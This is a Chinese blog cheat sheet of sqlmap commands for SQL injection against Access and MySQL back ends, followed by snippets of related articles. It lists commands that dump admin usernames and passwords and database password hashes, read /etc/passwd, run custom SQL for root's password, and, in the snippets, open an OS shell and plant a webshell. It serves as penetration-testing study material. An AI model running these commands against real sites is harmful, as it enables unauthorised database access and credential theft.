常见的Sqlmap语句

最新推荐文章于 2024-07-15 15:39:35 发布
最新推荐文章于 2024-07-15 15:39:35 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 分散式学习历程记录 文章标签: passwords 数据库 user schema access table

Access:

 –爆表 sqlmap.py -u http://127.0.0.1/news.asp?id=7″  –table

–爆字段 sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –columns -T admin

–爆账号密码 ./sqlmap.py -u “http://127.0.0.1/news.asp?id=7″ –dump -T admin -C username,password

–is-dba 检测DBMS当前用户是否DBA

Mysql:

sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ -v 1

–指定注入id参数

sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ -v 1 -p “id”

 –cookie注入

sqlmap.py -u “http://127.0.0.1/page.php?id=1″ –cookie”COOKIE_VALUE”

–获取当前数据库 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –current-db

 –检索数据库管理系统当前用户 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –current-user

–所有用户 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –users

–所有密码 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –passwords

–所有数据库 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –dbs

–所有表 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –tables -D “information_schema”

–查看adminDB库中的user表 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ — columns -T “user” -D “adminDB”

–loadfile sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ –file /etc/passwd

–自定义sql语句 sqlmap.py -u “http://127.0.0.1/page.php?id=1&cat=2″ -v 1 -e “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″

songkaimsdn
关注
专栏目录
sqlmap语句.doc
04-29
- `--predict-output`: 预测常见的查询输出,提高效率。 - `--keep-alive`: 使用持久HTTP(S)连接,减少连接建立时间。 - `--null-connection`: 从没有实际响应体的HTTP响应中获取页面长度。 - `--threads=...
sqlmap命令详解
Pitbull2014的博客
12-20 1182
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sql注入之——SQLMap常见语句
温柔小薛的博客
07-19 3874
填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一、个人常用语句总结: 1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1 –level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
07-15 1409
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
sqlmap入门-爆库,爆表,列,字段
weixin_46626737的博客
11-14 7120
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs爆数据库 假设结果中有member数据库 ②爆表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③爆列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④爆字段 python sq
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap常用语句
08-14
标题:"sqlmap常用语句" 描述:"sqlmap是一款强大的开源工具,用于自动化SQL注入漏洞的检测和利用。本文将深入解析sqlmap中的常用语句,帮助安全研究人员和渗透测试工程师更熟练地掌握其功能,提高漏洞挖掘效率。" ...
SQLmap压缩包,SQLmap压缩包
06-07
SQL注入是一种常见的网络安全攻击手段,通过构造恶意的SQL语句来控制或访问数据库SQLmap的工作原理是自动化地探测输入参数与SQL查询之间的关联,然后尝试执行各种注入技术,如盲注、时间延迟注入、union查询注入等...
sqlmap的某个版本
10-05
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员有效地发现和利用数据库层面的安全弱点。在这个特定的版本"sqlmap-6b7a1df"中,...
sqlmap.zip
10-31
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过向Web应用程序提交恶意SQL语句来操纵数据库SQLMap的工作原理是通过自动化地尝试多种注入技术,识别并利用潜在的SQL注入点,从而获取数据库中的敏感信息,甚至...
Sqlmap常用语句
HurryPotter
04-04 601
Sqlmap常用语句: 转自 http://www.75271.com/1228.html 基础信息 pythonsqlmap/sqlmap.py -u “http://url/news?id=1” –current-user #获取当前用户名称 pythonsqlmap/sqlmap.py -u “http://www.xxoo.com/news?id=1” –curr...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 2120
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap使用语法基础
san3144393495的博客
04-23 554
-file-write #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;--dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)p=2 --is-dba -U 用户名 -v 1。--dump -T "" -D "" --start 2 --top 4 #列出指定数据库的表的2-4字段的数据。
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9351
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
sqlmap 常见使用方法
03-14
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它可以通过发送特制的SQL语句来探测和利用目标网站的数据库漏洞,从而获取敏感信息或者执行任意操作。 SQLMap常见使用方法如下: 1. 目标URL:指定要测试的目标URL,可以是一个单独的页面或整个网站。 2. 请求文件:指定包含HTTP请求的文件,可以是一个保存了请求信息的文本文件。 3. 请求头:指定HTTP请求的头部信息,包括User-Agent、Cookie等。 4. 数据库类型:指定目标网站所使用的数据库类型,如MySQL、Oracle等。 5. 注入点检测:使用"--dbs"参数进行注入点检测,确定目标网站是否存在SQL注入漏洞。 6. 数据库信息获取:使用"--current-db"参数获取当前数据库的名称。 7. 表信息获取:使用"--tables"参数获取当前数据库中的表名。 8. 列信息获取:使用"--columns"参数获取指定表中的列名。 9. 数据获取:使用"--dump"参数获取指定表中的数据。 10. 执行系统命令:使用"--os-shell"参数执行系统命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值